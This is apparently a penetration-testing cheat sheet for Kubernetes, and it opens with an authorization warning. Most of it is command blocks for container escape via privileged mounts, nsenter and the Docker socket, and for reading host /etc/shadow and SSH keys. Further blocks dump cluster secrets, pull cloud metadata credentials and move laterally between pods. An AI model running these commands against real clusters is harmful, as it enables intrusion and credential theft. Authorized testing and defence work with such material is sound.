Container Security
Kubernetes Security Testing
Container orchestration security assessment covering cluster misconfigurations, RBAC exploitation, pod escapes, and lateral movement in Kubernetes environments.
Authorization Required
Only test Kubernetes clusters you own or have explicit written authorization to test.
Unauthorized access to cloud infrastructure is a federal crime.
Reconnaissance
Container Detection
bash
# Check if running inside a container
cat /proc/1/cgroup
ls -la /.dockerenv
# Service account token location
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
# Environment variables
env | grep -i kubeAPI Server Access
bash
# Set up API access from inside pod
APISERVER=https://kubernetes.default.svc
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
# Test API access
curl --cacert $CACERT --header "Authorization: Bearer $TOKEN" $APISERVER/api/
# List pods in current namespace
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
curl --cacert $CACERT --header "Authorization: Bearer $TOKEN" $APISERVER/api/v1/namespaces/$NAMESPACE/podsExternal Enumeration
bash
# Scan for exposed API servers
nmap -p 6443,8443,10250,10255 -sV target.com
# Common K8s ports:
# 6443 - API Server (secure)
# 10250 - Kubelet API (secure)
# 10255 - Kubelet read-only
# 2379 - etcd
# Test unauthenticated kubelet API
curl -k https://target.com:10250/pods/RBAC Exploitation
Permission Enumeration
bash
# Check current permissions
kubectl auth can-i --list
# Check specific permissions
kubectl auth can-i create pods
kubectl auth can-i get secrets
kubectl auth can-i create deployments
# List service accounts
kubectl get serviceaccounts --all-namespaces
# List roles and bindings
kubectl get roles --all-namespaces
kubectl get clusterrolesDangerous RBAC Permissions
| Permission | Risk | Exploitation Path |
|---|---|---|
| create pods | High | Spawn privileged pod |
| get secrets | Critical | Access credentials, tokens |
| exec pods | High | Command execution |
| create rolebindings | Critical | Privilege escalation |
Pod Escape Techniques
Privileged Container Escape
bash
# Check if running as privileged
cat /proc/self/status | grep CapEff
# CapEff: 0000003fffffffff = privileged
# Mount host filesystem
mkdir /mnt/host
mount /dev/sda1 /mnt/host
# Access host files
cat /mnt/host/etc/shadow
cat /mnt/host/root/.ssh/id_rsa
# Escape to host via nsenter
nsenter --target 1 --mount --uts --ipc --net --pid -- bashHost PID Namespace Escape
bash
# If hostPID: true is set
ps aux # See host processes
# Inject into host process
cat /proc/1/root/etc/shadow
# Access host filesystem via /proc
ls -la /proc/1/root/
# Copy files from host
cp /proc/1/root/etc/passwd /tmp/passwdDocker Socket Escape
bash
# Check for mounted Docker socket
ls -la /var/run/docker.sock
# If present, spawn privileged container
docker run -it --privileged --pid=host --net=host -v /:/host alpine chroot /hostCredential Harvesting
Secret Extraction
bash
# List all secrets
kubectl get secrets --all-namespaces
# Decode secret
kubectl get secret mysecret -o jsonpath='{.data.password}' | base64 -d
# Get all secrets in JSON
kubectl get secrets -o json
# Search for cloud credentials
kubectl get secrets --all-namespaces -o json | grep -i awsCloud Metadata Service
bash
# AWS IMDS (if not blocked)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Azure IMDS
curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# GCP Metadata
curl -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/Lateral Movement
bash
# List all pods with IPs
kubectl get pods --all-namespaces -o wide
# Exec into another pod
kubectl exec -it target-pod -- /bin/bash
# Port forward to service
kubectl port-forward service/database 5432:5432
# Access internal services
curl http://internal-service.namespace.svc.cluster.localCommon Misconfigurations
Anonymous API Access
bash
# Test anonymous access
curl -k https://API_SERVER:6443/api/
# Should return 403, not 200Exposed Kubelet
bash
# Anonymous kubelet
curl -k https://NODE:10250/pods/Exposed etcd
bash
# Unauthenticated etcd
etcdctl --endpoints=http://ETCD:2379 get / --prefix --keys-onlyDefault Namespace Usage
bash
# All workloads in default namespace
kubectl get all -n defaultTools
kube-hunter
Hunt for security weaknesses in K8s clusters.
bash
pip install kube-hunter
kube-hunter --remote CLUSTER_IPkubeaudit
Audit K8s clusters for security concerns.
bash
brew install kubeaudit
kubeaudit allpeirates
K8s penetration testing tool.
bash
go install github.com/inguardians/peirates@latestkubeletctl
Interact with kubelet API.
bash
go install github.com/cyberark/kubeletctl@latest bash
# Trivy - Container vulnerability scanner
trivy image nginx:latest
trivy k8s --report=summary
# rbac-tool - RBAC visualization
kubectl rbac-tool viz --outformat dot
# kubectl-who-can
kubectl who-can create pods
kubectl who-can get secrets